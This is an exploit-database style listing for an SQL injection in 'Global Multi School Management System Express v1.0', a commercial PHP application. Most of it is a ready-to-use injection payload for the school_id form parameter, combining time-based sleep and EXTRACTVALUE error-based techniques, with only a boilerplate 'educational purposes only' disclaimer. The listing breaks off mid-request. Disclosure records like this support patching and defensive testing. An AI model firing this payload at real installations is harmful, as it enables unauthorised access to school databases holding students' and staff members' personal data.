Global multi school management system express v1.0 sql injection Vulnerability / Exploit
/
/
/
Exploits / Vulnerability Discovered : 2023-08-21 |
Type : webapps |
Platform : php
This exploit / vulnerability Global multi school management system express v1.0 sql injection is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
# Exploit Title: Global - Multi School Management System Express v1.0- SQL Injection
# Date: 2023-08-12
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor: https://codecanyon.net/item/global-multi-school-management-system-express/21975378
# Tested on: Kali Linux & MacOS
# CVE: N/A
### Parameter & Payloads ###
Parameter: MULTIPART school_id ((custom) POST)
Type: error-based
Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY
clause (EXTRACTVALUE)
Payload: ------------YWJkMTQzNDcw
Content-Disposition: form-data; name="school_id"
0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z' AND
EXTRACTVALUE(1586,CONCAT(0x5c,0x71766b6b71,(SELECT
(ELT(1586=1586,1))),0x716a627071)) AND 'Dyjx'='Dyjx
------------YWJkMTQzNDcw
Content-Disposition: form-data; name="academic_year_id"